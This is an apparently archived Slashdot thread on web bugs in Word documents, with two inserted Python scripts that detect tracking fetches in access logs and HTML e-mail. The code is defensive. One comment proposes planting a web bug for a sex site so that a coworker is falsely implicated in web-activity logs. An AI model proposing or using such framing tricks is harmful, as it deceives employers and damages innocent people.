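10.0.0.21 GET http://images.example/pics/grits_87.jpeg
10.0.0.21 GET http://images.example/pics/grits_12.jpeg
10.0.0.34 GET http://images.example/pics/grits_203.jpeg
10.0.0.34 GET http://images.example/pics/grits_87.jpeg
10.0.0.21 GET http://static.example/art/logo.gif
10.0.0.34 GET http://static.example/art/logo.gif
10.0.0.55 GET http://static.example/art/banner2.gif
"""


def path_template(path):
    """Collapse every run of digits so grits_87.jpeg and grits_12.jpeg compare equal."""
    return re.sub(r"\d+", "#", path)


def variable_name_fetches(log_text, min_variants=3):
    """Return (host, template) groups whose concrete paths vary in at least min_variants ways."""
    variants = defaultdict(set)   # (host, template) -> distinct concrete paths
    clients = defaultdict(set)    # (host, template) -> clients that fetched them
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 3 or fields[1] != "GET":
            continue  # skip lines that do not match the assumed format
        client, _method, url = fields
        parts = urlsplit(url)
        key = (parts.hostname, path_template(parts.path))
        variants[key].add(parts.path)
        clients[key].add(client)

    findings = []
    for (host, template), paths in variants.items():
        if len(paths) >= min_variants:
            findings.append({
                "host": host,
                "template": template,
                "variants": sorted(paths),
                "clients": sorted(clients[(host, template)]),
            })
    return sorted(findings, key=lambda f: (f["host"], f["template"]))


if __name__ == "__main__":
    for f in variable_name_fetches(SAMPLE_LOG):
        print(f["host"], f["template"], len(f["variants"]), "variants from", f["clients"])
```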

  116. Re:This isn't much different than Web Pages alread by crucini · · Score: 1
    Here's an open question: what can we (we meaning the slashdot crew) do to get people to read the stories before posting?
    The posting form could require some information from the article. It could be multiple choice, i.e. "According to the cited URL, the exploit affects:"
    1. Only Word
    2. Word and Excel
    3. Word, Excel and Powerpoint
    4. Word and Powerpoint
    Three questions would give a 1/64 chance of guessing correctly. If the questions are answered incorrectly, /. could redirect to the cited URL. All of this could be scripted around by a determined adversary, but I don't think the obvious-askers are determined adversaries.
  117. Pot, Kettle, Black by __aapbgd5977 · · Score: 3

    Ok, so if the Privacy Foundation is so upset about web bugs in MS Word documents, why does their OWN ADVISORY have a web bug in it? My filter (Guidescope) caught this little sucker: http://www.privacyfoundation.org/graphics/1pix.gif (Awaiting an explanation.)
    ==
    This post sponsored by the American Obstetrics Society:

    1. Re:Pot, Kettle, Black by Philippe · · Score: 3

      It's a spacer gif. Big deal. Web designers use them all the time. Plus, it's not a web bug since it originates on the same server.

  118. New Features!!!! by SlashGeek · · Score: 1
    Hmm.. Another "Feature" in a Micro$oft product, this one is almost as good as the one that lets nice people run .vbs scripts on your computer for you in Outlook =) Gee, is it any wonder why Windoze is closed source?

    I guess he was true to his word when he said "We are more concerned with adding new features than fixing bugs.." Wow Bill, I can't wait till the next Windoze release to see what nice "Features" you have added!!!

    --

    --I assume full responsibility for my actions, except the ones that are someone else's fault.

  119. Its M$, so it must be bad. by Bender+Unit+22 · · Score: 1

    This is a feature in the program that you can embed web content in your document. I have the feeling that because it is in a M$ program, it is an evil thing. Would this have been a feature if it was in Star Office on X? I could see a lot of good uses for this feature as well as bad.
    It's like cookies. Cookies can be very good when programming a website that will be user-friendly, but they can also be used for "evil" purposes. The only thing to do is education.

    Everything these days is linked to the internet. Every program you get these days has an "Automatic Update" and depending on how paranoid you are, the feature is a way of keeping an eye on you personally. You can't enjoy the wonders of the web these days without someone making some kind of a log somewhere. Now I am not saying that I enjoy this. I have a "personal firewall" on my PC so that I can see when a program wants to go online, since my PC is "Always On", I need this because the only way to disconnect from the internet for me is to unplug the cable from the LAN.
    What people need is to be aware of what the computer is about. Clever people who sell PCs try to give people the impression that the PC is as "simple" as your VCR. Only a few users (mostly the /. type) understand what the consequence of installing a program can be and what they need to be aware of.
    These problems become even more scary as progress gives the population connections like DSL connections where they will be "always on".


    ---

  120. Here is how I read word docs. by Ice+Station+Zebra · · Score: 1

    #strings "why do most word users place spaces in the file name.doc"

  121. You can do this with Star Office by dubious21 · · Score: 1

    Open up a new text file and insert a graphic whose file location is on a web server and it does the same thing. This is not a big deal. This is not a MS problem. Makes me wonder why I bother coming here anymore. You are hard pressed to find stories that are not flamebait. This story should never have been posted in the first place. it is a non issue.

  122. Windows Media Player has the same problem ... by dougmc · · Score: 1

    Nobody seems to have mentioned it yet, but Windows Media Player files can be (and are) made to go to a web site during, before or after the movie plays. This has all the same security implications that the Word/Excel/whatever problem has, except that it's typically obvious when it happens.

  123. Re:More reason to use pine by r2ravens · · Score: 2

    This is all the more reason that I use pine to read my mail and reject (>/dev/null) most html-only mail I receive.

    If I get something really important from one of my friends or acquaintances, I might save and look at it in vi... but not before shooting a return message to educate them that I won't read the next one they send in html-only format.

    Remember, there is a special place in hell for those who send html mail. :)

    --
    War is Peace. Freedom is Slavery. Ignorance is Strength. - George Orwell or George Bush?
  124. How to block this by Ryan+C. · · Score: 1

    Anti-trojan programs such as Zone Alarm are great to stop things like this. If a Word doc tried this, Zone Alarm would pop-up a box saying something to the effect of "MS Word is trying to access the Internet, OK/NO/NEVER/ALWAYS". Word has long ago gone into my list of apps too stupid to be trusted and can't get to the Internet.
    Ryan Campbell

    --
    -Ryan C.
  125. Re:This isn't much different than Web Pages alread by Col.+Panic · · Score: 2
    How about making it a /. poll which will open discussion about it for a few days. Maybe something like:

    Reasons people skip /. articles and go right for the comments:

    to get furst

    to be the first to pay homage to NP

    to look like an idiot in front of one's peers

  126. Re:So maybe... by lpontiac · · Score: 1

    IIRC, many branches of the US Government (in particular, the Department of Defense) standardised on SGML. Wordperfect was the wordprocessor of choice because it supported SGML. Of course, the US Federal Circuit makes its rulings available in Word 7.0 format... *sigh*.

  127. And the issue is? by Bagheera · · Score: 1

    I read the post on BugTraq earlier today and my immediate reaction was "and the point is?" Shutting off this "web bug" is trivial if someone is concerned with privacy. It's also relatively useless for tracking confidential information, unless the Industrial Espionage community has somehow managed to miss the "You're on the Net, you're vulnerable" point.

    While it can provide some useful information (as someone pointed out with the resume thing) a well configured proxy server completely negates this little "bug."

    Honestly, this is no more insidious than logging normal connections to a web server. While the cookie issue is a potential concern, it shouldn't be a big deal to bypass. After all. How hard is it to modify your cookie files?

    We won't go into the bloatware aspects of Word, or why they seem fascinated with 'transparently integrating" everything. This is pretty much a non-issue.

    --
    Never attribute to malice what can as easily be the result of incompetence...
    1. Re:And the issue is? by talks_to_birds · · Score: 1
      "Never attribute to malice what can as easily be the result of incompetence..."

      ...and your very own .sig line betrays what the issue is.

      The vast majority of business or governmental users of Word don't even begin to have a clue about these wonderful *features* that Micro$oft keeps coming up with.

      "While the cookie issue is a potential concern, it shouldn't be a big deal to bypass.

      After all. How hard is it to modify your cookie files?"

      Are you kidding?

      How many workers in a business or governmental setting are aware that the PC they work on probably has a full-time, always-on internet connection, even when they're *not* running IE?

      And of those people, how many would even begin to think that using Word, or viewing a Word document, would initiate a connection out onto the internet that involved the setting and reading of cookies?

      Here's a hint: nobody.

      The issue is that once again, there is a *feature* in a Micro$oft product which exposes unsuspecting, unknowledgeable users to a wide range of potential risks that they are utterly unaware of.

      Hell, most IS sections are probably unaware of this issue, and too busy to do something about it if they knew what to do...

      Micro$oft built this into Word, acting as though the entire universe works in some ideal, secure bell jar, far, far away from crackers and script kiddies.

      The real world is nothing like that at all.

      Hell, today at work I got *yet another* one of those life-phases.txt.txt (or whatever the hell it was..) attachments in some email.

      Remember that wonderful *feature* from Micro$oft: default execution of a VB script email attachment?

      Micro$oft has no clue about the real world: they're too ingrown and monolithic.

      And they're too arrogant to care.

      t_t_b
      --
      I think not; therefore I ain't®

      --
      I'm on PJ's "enemies" list! Are you?
  128. IE Security by Deathlizard · · Score: 1

    Question. If Word uses IE to get the information on a Word document, would that transaction be covered under IE's security settings?

    As for the bug itself, it doesn't surprise me because it's Microsoft's model of making software. The reason Microsoft software is like that is because their programming model insists that if a module already exists on the system, use it. This isn't a bad model to follow because it keeps program size to a minimum, but it does raise security issues.

    Everything that Microsoft makes nowadays integrates with everything else Microsoft makes. It's what businesses want. They don't want to have to switch applications around when they want to send a Word document in E-mail, for example. They just want to push a button, which turns Word into an E-mail program and send the mail. The problem with this is that MS does not think of the possible security implications when they do this.

    Their biggest focus right now should be a system-wide global security model that integrates into all of their software products, but as of yet, nothing like this exists. The only product that has security right now is IE, and even it's lackluster at best. Win2k is really close to this but it still leaves the remote Internet part of the machine behind. Although you could set it up so that a user could log in and do absolutely nothing from there, including logging off and even seeing a start menu for that matter.

    Their main security focus is local system security when in reality it should be focused on both local and remote security.

    -
    BTW Does anybody know how Extrans Work?

    1. Re:IE Security by Felinoid · · Score: 1

      This sort of code reuse is not unlike what is already done in Unix.
      Beyond libraries you may pipe from one program to another.

      But....
      It ends up being the user's choice...
      Should my e-mail be in Netscape? Or Pine... Netscape should call up pine and pipe the information....
      Quite a number of apps exist that call up "the web browser of your choice" in Linux... tin allows you to send usenet posts to outside applications...
      Pipe content to more... ls -xF |more
      du | more

      It should not be automatic that graphics are pulled by a browser... you should be able to call them up from a graphics viewer instead... like XV.

      Unix programmers don't always make full use of this and that's sad but it's a neat feature to have...
      Being able to pipe content from IRC into e-mail... because I set that up... not because IRC used the wrong part of e-mail code...

      --
      I don't actually exist.
  129. Irony: Web bug in by JohnQPublic · · Score: 1

    Slightly off-topic, but the link above to Transparent Society triggered Opera's third-party-cookie detector, thus allowing me to defeat the web-bug placed in the article page.

  130. Word*view* as well. by DeeKayWon · · Score: 1

    I don't have Office, but I use their WordViewer to read Word docs in my Win98 partition. I tried the bugged .doc file and sure enough, Zonealarm notified me that Wordview was trying to access the internet. However, Zonealarm didn't report anything when I opened the bugged Excel file in Excelviewer.

  131. Re:This isn't much different than Web Pages alread by GrammarPolice · · Score: 1
    Unless the spell checkers these days post you're most embarrasing mistakes on the net, the Word bug problem is worse by far!

    No need for that, since you seem perfectly willing to post them yourself. Try your and embarrassing.

    --

    Verily hath their moderation points been wasted upon me.

  132. FUD by Saint+Stephen · · Score: 1

    The noise about this surely disabuses us of the notion that the ABM camp isn't capable of FUD.

  133. Not a bug.. a feature.. a stupid one by Felinoid · · Score: 1

    This is "Yet another feature" in a long list.
    Yes they are features... They are there for the user to enhance the user experience...
    All in all they are very much features and do exactly as they were designed...

    But these are stupid features.
    The people designing these features DO NOT think about how they will be used or about the people who will use them.

    In order to make a "User Friendly" operating system you MUST protect the user against himself. You MUST consider how the average intelligent[1] user will behave and how he will use that feature.

    Email viruses are a result of NOT thinking about standard user behavior or protecting the user from himself.
    Such things are excusable in an operating system purportedly for techs like Linux or Solaris but not for the average user like Windows or Mac.

    Linux and Solaris programmers do give SOME consideration to the user experience. Not necessarily much but enough to know not to run something sent in e-mail before the user has a chance to examine it first.

    E-mail clients don't run code.. that is outside its function. Wordprocessors shouldn't run programs or execute commands either.
    Neither should wordprocessors pull data up from the outside world.. or call up web browsers...
    A wordprocessor file is self contained.. at least should be..

    HTML should do this.. HTML does this... we expect this of HTML..
    But a wordprocessor document is a static document. It should never do anything a printed page wouldn't do.
    Many HTML documents are "Living" documents and behave very differently from wordprocessor documents.

    All this behavior is totally normal for an internet document. Wordprocessor files are NOT internet documents.

    If emacs did this we wouldn't go berserk... emacs is far more than an editor.. we expect it to flip and dance. That's the neat part... that's also why it's a bit on the big side (for an editor..)
    But then I use pico for my editing needs...

    It's like if your car started to fly when you didn't expect it.. That would NOT be good.
    Hovercraft.. yes... Car.. no...

    It's a neat SOUNDING feature...
    But what's the function?
    This is no good...

    Microsoft keeps adding these features and Windows is going to have a great deal of unexpected behavior...
    And Linux will seem easy in comparison...

    With Linux you know what to expect...
    The whole idea of having a user friendly os is so you can easily understand what's going on just by looking at the pretty pictures...

    But that's not going to happen when your wordprocessor wants to load stuff from the Internet.
    That makes no sense....

    At least with Linux the user might be able to figure out why his offline document isn't loading... he'll recognise the attempt to load stuff from the network.... when the DSL or Cable modem is turned off...

    Mac really is user friendly....
    I guess that's why Linux developers are drooling over MacOS hacks... But we end up copying Windows simply because Microsoft isn't original enough to get a look and feel patent on anything.

    [1] It was once thought you could make an idiot proof operating system but idiots proved to be overwhelming.
    The target is scaled back to intelligent users who simply don't have the time to learn what an RS232 is.
    Dumb users are simply beyond all hope...

    --
    I don't actually exist.
  134. FUD fud everywhere... by Felinoid · · Score: 1

    Realistically speaking...
    Open source therefore not FUD? Wrong...
    Microsoft therefore not Zealot? Wrong
    Linux advocate therefore Zealot? Wrong
    Assume nothing.....
    There are whitehats at MsHQ, BlackHats in Open source...

    However for the moment Microsoft is very dark gray and open source very very light gray...

    But there are bad guys in every group....
    Zealots in every camp... FUD from all sources... Nobody is perfect...

    --
    I don't actually exist.
  135. This is minor stuff by Metrol · · Score: 2

    Any webmaster who has put Word through its paces already fully understands this exploit. The notion of pulling in graphics dynamically from a remote site is old news. Also, since Office 95 all the apps in there stopped being what they were and became development platforms. That's five years ago folks, hardly late breaking news.

    What I can't ever seem to get posted early in an article such as this is a warning about the wonders of the .reg files. Mark my words here, we'll be hearing a LOT more about .reg file links in E-Mail and on the web making systems unusable.

    If you're a Windows user, go into Netscape right freaking now under Edit-Prefs-Navigator-Applications and take out that entry for .reg files. Through the use of a link or even a re-direct a nasty site can do some pretty damaging stuff with a far smaller file than ILOVEYOU was.

    On the other hand if you're an IE user... ummm, I hope you remember that browser integration with the OS is a *cough* Good Thing(tm). Keep remembering that through the repair install.

    --
    The line must be drawn here. This far. No further.
  136. Works also with Staroffice in Linux by Jump · · Score: 1

    Yes! It also works with Staroffice 5.2/Linux. Don't know if it also reads cookies.

  137. I don't think a virus/worm is the right way to go by jesterzog · · Score: 2

    Sounds like fun but to be honest I hope it doesn't happen. Specifically because it wouldn't set a good example for the cause.

    If in the very one dimensional, ignorant and manipulatable public eye, DeCSS was more associated with virus-spreading crackers and script kiddies than it already is, it would only provide ethical ammo to lawsuits that are against it.

    I guess the alternative is a polite self-propagating worm that asks the user's permission before it propagates itself. It wouldn't have nearly the same effect, though. :(


    ===
  138. Re:Then it Should be Emasculated With All Speed! by Opinion+Dalek · · Score: 1

    No I am saying that Internet explorer settings should determine how cookies etc. work, not tools like Word (which are just using IE indirectly).

    Of course the Internet is unsafe, but IE is the gatekeeper, not word.

  139. Re:Its M$, so it must be bad. by cowbutt · · Score: 1

    Already in StarOffice 5.2! Try it and see... use the 'link' tickbox when inserting graphics from a file (specify a URL as the source).

  140. Device driver bloat! by shippo · · Score: 1
    Why are so many device drivers (and not just Windows ones) so bloated?

    A device driver should do no more than let the OS communicate with the device. Instead all the big companies decide to add too many extra doo-dohs and gizmos, none of which give any real benefit.

    Every recent Windows driver I've seen has some additional user space control tool that does nothing that the standard dialogues offer. I've even seen fancy (and huge, > 1MB) NIC diagnostics that don't even detect that the card is the correct model as supported by the driver!

    Even some Unix flavours I've used have come with bloated device drivers. One was impossible to install as the combined disk space of two device drivers was too large for the boot filesystem. The drivers in question attempted to make things easier by covering entire ranges of SCSI adaptors and NICs. Thanks, Compaq! Linux has got it right in this respect. Pure and simple drivers, no more.

  141. Lobby Mozilla to keep this from happening to them by Zigg · · Score: 2

    Mozilla has a problem with this too, and it's in danger of being cast aside because not enough people care about it.

    Go cast your vote for bug 28327!

  142. Correct by uradu · · Score: 2

    That's exactly what all the "everything is a file" defenders overlook. No inodes, no security settings, other than some all-or-nothing thing. Sure you can make everything LOOK like a file (heck, even Windows does that to some extent), but that doesn't MAKE it a file. If it really is a file, copy that socket to a floppy and let me put it on my machine. Hmm?

    Uwe Wolfgang Radu

  143. Zone Alarm Questions by linuxrunner · · Score: 1

    All this brings up a few questions I've had.
    Zone Alarm has come up a few times in these discussions. I have it and currently run it on my two computers. I've definitely learned a lot more than I did about privacy since instituting Zone Alarm on my computers.

    Ok, here's my question:

    We know that zone alarm stops Windowz Media Player from accessing the internet but exactly what is it accessing the internet for? Anyone?

    I would love to know the answer to this question.

    Linuxrunner

    --
    www.slightlycrewed.com - Because aren't we all?
  144. MS Word? by SilkyHog · · Score: 1

    Let them put a bug in MicroSoft Word. I don't care. I use it, like most people for writing, which it was intended to be used. As for IMPORTANT documents, I use NotePad and PGP!!!!

    --
    10 = 2 SilkyHog
  145. Re:Word format for resumes by fizbin · · Score: 1

    I recently completed a job search (which although it ended well, did not begin well) and I didn't get any responses to the headhunting agencies I emailed my resume to until I started sending it out in Word format. (Silly me; I thought HTML would be the preferred format for an internet applications programmer.)

    Maybe that comment about text-only resumes applies to large companies, but in the world of small headhunting firms, Word 97 is the way you should send it to them. (My PDF-format resumes didn't get any response either, despite the fact that the most common reason I heard for wanting Word format was that they wanted to see my resume exactly as I intended)

    This is one reason I actually wish everyone in the Microsoft world would go out and upgrade to Office 2000 - if I could guarantee that those people who wanted Word format all had O2K installed, then I could just have one version of my resume, and symlink resume.doc to resume.html.

    (If you have Office 2000, you can look at http://math.jhu.edu/~martind/resume.html and then at http://math.jhu.edu/~martind/resume2k.doc, which is just a symlink to the same file. See how easy it is to have a valid HTML file that formats nicely as a Word document the way you want it to?)

    Face it - resumes are used to get you through the part of the job process that is governed not by technical people, but by people who know offices and paperwork; as far as most of those people are concerned, anything outside of Word isn't a real document.

  146. This is why I hate them ... by alleria · · Score: 1

    Regarding the potential use of Web bugs to track Word documents, Microsoft said that there is no evidence that such activities are occurring.

    Um, well, let's see: regardless of the potential use of cyanide to murder people, the U.S. government said that there is no evidence that such activities are occurring. It then refused to regulate sales or fix the problem in any other way.

    ... oh wait. The government does regulate cyanide...

  147. E.T. phone home!! by the+devlin · · Score: 1

    I have only one thing to say: E.T. phone home!! E.T. phone home!!

    --
    Welcome to Slashdot. Please don't feed the trolls.
  148. Re:This isn't much different than Web Pages alread by multimed · · Score: 1
    As stated, this is different from HTML because HTML is supposed to do this and we can view its source.

    But you're just plain wrong to say that if you're doing something on the Internet, to just accept that you're being logged. First of all, opening a word document is an offline activity.

    MS Word peaked with version 5.1 (for the Mac anyway whatever the equivalent version was for windows) and has been downhill bloat-ware ever since.

    --
    Vote Quimby.
  149. Interesting Info from The Register by frank249 · · Score: 1
    from the register.

    Smith describes himself as the CTO of the Privacy Foundation, which we'd never heard of before - Privacy International is the long standing clearing house and advocacy body for privacy information on both sides of the Atlantic, and in Asia too. The Privacy Foundation appears to be just Smith, journalist Stephen Keating... and a webmaster.

    But publicity stunt or not, Smith has drawn attention to a long standing feature of applications that use embedded content. Microsoft product manager Lisa Gurry was quite correct in pointing out that this is neither new nor limited to Microsoft applications.

    However the remedy she suggested was more telling than Smith's advisory. Users should disable the cookie feature on their browsers, she told CNet. Quite coincidentally, CNet itself holds the mother-of-all-patents for this kind of user tracking: a fact that our fearless friends at CNet and ZDNet modestly declined to mention in their coverage.

    From Gurry's comments it sounds as if Microsoft wants the problem to fade quietly. That's unlikely, given the scope for abuse. More pertinently, there doesn't appear to be a way of turning off the attempted retrieval of remote content from within the application. You can only turn off the cookies themselves (and clobber your browser).

    It took billions of dollars of lost customer time before Microsoft attempted to apply some finer granularity to its email security model, and we'll be interested to see how it reacts to this, particularly given its recent posturing as the consumer champion against the evil cookie.

    --

    Today's vices may be tomorrow's virtues.

  150. HR by latro · · Score: 1


    Well, at most companies, your resume has to pass through the dreaded HR dept. before it gets to anybody in IT/IS. This means that they are going to want MSWord - no way around it. I usually just include the text version in my e-mail and attach the Word version.

    -------

    --

    -------

    "It was people! People soiled our green!"
  151. User initiating actions vs document initiating by Sloppy · · Score: 2

    fire up vi and type this: !!wget http://www.slashdot.org/ 2>&1 >/dev/null ; cat index.html

    voila, web browsing from your text editor.

    The process involved is conceptually the same as what you are talking about in Windows, except that the call to the other application is made using COM rather than invoking a new shell and then running an executable. If you had a vi macro to do the above command, then you would have the same situation as in Windows.

    I think you're not getting it. There's a huge difference. In your vi example, the action you're describing is triggered by the user, or by a macro that the user has set up (and he still has to trigger the macro himself). But can you create a file with a wget command in it, and send it to me, so that when I load it into vi, my computer will run wget? No.

    It has nothing to do with subshells or COM. It's about documents becoming applications. Users make choices that can affect their security whenever they run programs or perform actions in programs. With Microsoft apps, now merely viewing a document is an action that can have an impact on his security.

    Because of this, Windows is now a system that should only be used by trained experts. Think about that, the next time you're buying a computer for grandma. Will grandma understand that viewing a document that someone sent her, gives the sender power over her computer (and thereby power over herself, if she uses the computer for anything important)? Even Linux would be a better choice! (But a Mac would be best. :-)


    ---
    --
    As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
  152. Re: ...With All Speed! - Is Active Content okay? by MidnightLog · · Score: 1

    Don't you think that a better solution would be to use appropriate tools for the purpose of "automation" and have properly trained staff who must use them. A task with consequences as serious as this should be done by trained professionals and not blundering amateurs.

    It's a shame that this is currently at 0 and Opinion Dalek's response is at 1. Please get yourself an account Mr. (or Ms.) Anonymous Coward.

    I wonder if "Active Content" is a worthwhile thing to have. Instead of any old Word document being able to automate my system, I would prefer if the scripts needed to be separate from the document. The extension of the script file would indicate the type of language it is written in instead of the container it is trying to automate.

    In this way, things could still be automated, but you have the opportunity to secure things on a script by script basis instead of on an action by action basis. In addition, people can tell what's what simply by looking at the file extension. If you received a document and associated script file attached to an e-mail, you could choose to run the script or simply open the document itself. More options would be available to the content "consumer". I believe this is a good thing, but I'm not a content "producer". They may have a different viewpoint.

    --

    To understand what's right and wrong, the lawyers work in shifts ...

  153. Re:Zone Alarm by JackVance · · Score: 1

    ZoneAlarm Pro offers password protection, and customized security features. If you run a network it might be worthwhile, but for personal use the free version should be plenty.

    You can probably find more information on Steve Gibson's Shields Up! newsgroup at news.grc.com

    --
    ~ I haven't lost my mind. It's backed up on tape somewhere.
  154. Re:This isn't much different than Web Pages alread by Karellen · · Score: 1

    "A couple of years ago, people didn't expect to have Word Processors to check your spelling as you type."

    Yeah, and that sucks too.

    It slows me (and everyone else I know who can type) down no end by interrupting and destroying a chain of thought, or just the general flow of typing.

    Turn it all off. Spell check at the end and fix problems then. It takes less time in the long run cos you're spending less time context switching.

    --
    Why doesn't the gene pool have a life guard?
  155. Re:This isn't much different than Web Pages alread by Kaa · · Score: 2

    General rule of thumb: If you're doing something on the Internet, you're being logged.

    Generally true, but if you are willing to suffer some inconveniences, you *can* significantly raise the level of your anonymity on the web. A simple way is to use Freedom anonymizer (non-free in both senses and no Linux version, but very useful nonetheless). The logging goes on, but logging content-free data is not very useful.

    Do something useful: read "Transparent Society" and/or work on making yourself a more tolerant person, rather than fretting about your "privacy" (unaccountability).

    Thankyouverymuch. I don't like Brin's ideas and would do a lot NOT to live in a society as he describes. I also don't see why you think that tolerance and desire for privacy are opposites or at least negatively correlated. Not to mention that privacy != unaccountability (you probably had anonymity in mind, but even then != stands).

    Kaa

    --

    Kaa
    Kaa's Law: In any sufficiently large group of people most are idiots.
  156. Re:Lobby Mozilla to keep this from happening to th by Karellen · · Score: 1

    One thing I'd really like mozilla mail to do is have a prefs checkbox option that is simply

    "View all email as plain text"

    So, if I get an HTML email, I see all the tags. If I get a multipart (text AND html), I see both parts, with all the fucking cruft along with that. If I get attachments, I can see the text of all of those as well.

    In fact, I want 'view source' for all my emails on by default.

    Yes, keep the 'headers' options, so that you can select which headers to view (all, normal, brief) as is currently, and keep the box to get a list of attachments and the option to save them each individually.

    But I'd really like an option to view the text of a whole email as plain text. That's what emails were for, and that's the way I want to read mine.

    That would solve _all_ of these types of bug (present and future - someone mentioned in the comments for that bug that if you turn off images from sites, malicious sites could put in links to stylesheets or some other resource - this may be extended in the future), and let me see at a glance all the cruft my colleagues are passing around, and ask them (politely) to stop it.

    --
    Why doesn't the gene pool have a life guard?
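
Comment 156 above notes that turning off images is not enough, because stylesheets and other resources are fetched on render too. As an added example (not part of the original thread, and not Mozilla code), this Python script lists every reference in an e-mail's HTML parts that a renderer would load without user action; the sample message, the `tracker.example` host and all function names are constructed for illustration.

```python
"""List every resource an HTML e-mail would fetch automatically when rendered."""
import re
from email import message_from_string, policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# (tag, attribute) pairs that a renderer loads without any user action.
AUTO_FETCH = {
    ("img", "src"), ("script", "src"), ("iframe", "src"), ("frame", "src"),
    ("embed", "src"), ("object", "data"), ("input", "src"),
    ("body", "background"), ("table", "background"), ("td", "background"),
    ("link", "href"),
}
CSS_URL = re.compile(r"""url\(\s*['"]?([^'")\s]+)""", re.I)
CSS_IMPORT = re.compile(r"""@import\s+['"]([^'"]+)""", re.I)


def is_remote(url):
    """True for http(s) and protocol-relative URLs; cid:, data:, relative paths are local."""
    parsed = urlparse(url.strip())
    return bool(parsed.netloc) and parsed.scheme in ("", "http", "https")


class RemoteRefFinder(HTMLParser):
    """Collects (tag, source, url, tiny) for each automatically fetched remote URL."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.refs = []
        self._in_style = False

    def _add(self, tag, source, url, tiny=False):
        if is_remote(url):
            self.refs.append((tag, source, url.strip(), tiny))

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "style":
            self._in_style = True
        for name, value in a.items():
            if (tag, name) in AUTO_FETCH:
                # <link> only loads on render when it is a stylesheet.
                if tag == "link" and "stylesheet" not in a.get("rel", "").lower():
                    continue
                # A 0x0 or 1x1 image is the classic invisible web bug.
                tiny = (tag == "img" and a.get("width") in ("0", "1")
                        and a.get("height") in ("0", "1"))
                self._add(tag, name, value, tiny)
            elif name == "style":  # inline CSS such as background:url(...)
                for url in CSS_URL.findall(value):
                    self._add(tag, "style", url)

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:  # contents of a <style> block
            for url in CSS_URL.findall(data) + CSS_IMPORT.findall(data):
                self._add("style", "css", url)


def remote_refs(raw_message):
    """Parse a raw RFC 822 message and return remote references from all text/html parts."""
    msg = message_from_string(raw_message, policy=policy.default)
    finder = RemoteRefFinder()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            finder.feed(part.get_content())
    finder.close()
    return finder.refs


# Constructed sample message (not from the thread).
SAMPLE = """\
From: sender@example.com
To: reader@example.com
Subject: constructed sample
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="BOUND"

--BOUND
Content-Type: text/plain; charset="utf-8"

Quarterly report attached.

--BOUND
Content-Type: text/html; charset="utf-8"

<html><head>
<link rel="stylesheet" href="http://tracker.example/s.css?id=42">
<style>@import "http://tracker.example/i.css"; p { background: url(http://tracker.example/bg.gif) }</style>
</head><body>
<p>Quarterly report attached.</p>
<img src="cid:logo@example.com" width="120" height="40">
<img src="http://tracker.example/open.gif?id=42" width="1" height="1">
<a href="http://www.example.com/">site</a>
</body></html>

--BOUND--
"""

if __name__ == "__main__":
    for tag, source, url, tiny in remote_refs(SAMPLE):
        print(f"{tag:6} {source:6} {url}{'  [1x1 or 0x0 image]' if tiny else ''}")
```

The ordinary `<a href>` link and the `cid:` image embedded in the message are not reported, since neither causes a request when the message is merely opened.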
  157. Re:Then it Should be Emasculated With All Speed! by MidnightLog · · Score: 1

    Of course the Internet is unsafe, but IE is the gatekeeper, not word.

    I'm not sure that the all-in-one approach that MS is using for Internet security is the right one, but if it is then the IE settings need to be a lot more flexible. Here's my wish list for improving IE security. Please note that I'm no expert on IE security settings, and I don't have IE installed on this computer so I can't check things as I type, so some of these ideas may already be implemented in one form or another.

    • There should be several levels of trusted (and restricted) sites.
    • You should be able to classify sites into a trusted or restricted level in a more generic way. Defining site names with regular expressions may be the way to go here.
    • You should be able to determine what the default level is for web browsing.
    • There should be a separate level for HTML viewer applications like e-mail or Word. This would allow you to turn images off for HTML e-mail, without doing that for regular web browsing.
    • You should be able to create a new security level.
    --

    To understand what's right and wrong, the lawyers work in shifts ...

  158. The article is about depression, not computers. by Futurepower(tm) · · Score: 1



    The key sentence in the article "Ain't no network strong enough" is:

    "Schneier sympathizes; he admits that depression forced him to cease working on the manuscript for over a year."

    This is not an article about computers; it is an article about a man's problem with depression. Mr. Schneier cannot admit to himself directly that he has inner conflict, so he is using computer security as a symbol of his conflict.

    OpenBSD (http://www.openbsd.org/) advertises: "Three years without a remote hole in the default install! Only one localhost hole in two years in the default install!" This result has been achieved by auditing the source code.

    Windows 98 is not an example of hopelessness of computer security; it is an example of the business model of a monopoly. Microsoft makes more money if it provides buggy software; the bugs give users a reason to upgrade to a new, slightly less buggy version.

    Extremely rapid progress is being made in computer security; it is incorrect to paint a picture of hopelessness.

    --
    Bush's education improvements were
    1. Re:The article is about depression, not computers. by garnier · · Score: 2

      I think you are comparing apples with oranges here. What does OpenBSD have to do with Windows 98?

      OpenBSD is an OS targeted at small to medium size servers which are almost always networked. It is very secure and very stable so it is very good at its job.

      Windows 98 is targeted at PCs that are connected to the Internet using a modem. It does not run any services so it is quite secure in that aspect. It is very easy to install. It runs thousands of applications and games (which all install with minimum fuss). You simply cannot do all that with OpenBSD (yet?). Having a BSOD once every few weeks while surfing the Internet or editing a document in Word is a compromise that most people are willing to make (and do make), since the alternative is to become a CS major first and then install Linux/OpenBSD/whatever and then not being able to run the applications that you are familiar with.

      As for your argument with Microsoft putting bugs so that they can then sell upgrades with fewer bugs, this is just your paranoia talking. I am not saying that if their QA was more strict they couldn't produce a more stable OS but this is a long way from saying that they put bugs there on purpose. Besides look at the deterioration in performance in all the windows releases:
      Windows 98 less stable than Windows 95 less stable than Windows 3.11
      Windows 2k less stable than Windows NT4 less stable than Windows NT 3.51

  159. How to screw those you hate by Autonomous+Crowhard · · Score: 1
    If you work at a company that traces web activity, here's a simple trick to play on people you really hate:

    Insert a web bug for www.sex.com!!!

    "Gee, Simon... It looks like you've been viewing nudy sites during work hours."

    "But sir... I was just reading the product documentation."

    The possibilities are endless!

  160. Re:Its M$, so it must be bad. by Bender+Unit+22 · · Score: 1

    Interesting, so much for attacking M$ :-)
    ---

  161. Narmaluc by carrier+lost · · Score: 1
